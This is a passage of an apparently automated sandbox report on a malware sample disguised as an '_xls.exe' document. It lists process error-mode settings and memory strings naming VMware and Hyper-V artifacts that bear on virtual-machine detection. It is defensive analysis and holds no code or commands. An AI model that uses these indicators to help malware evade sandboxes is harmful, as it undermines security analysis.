Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.9.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.9.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.9.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=" |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.9.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.9.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.9.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.9.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.9.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.9.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.9.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1783472169.00000000010E6000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll? |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |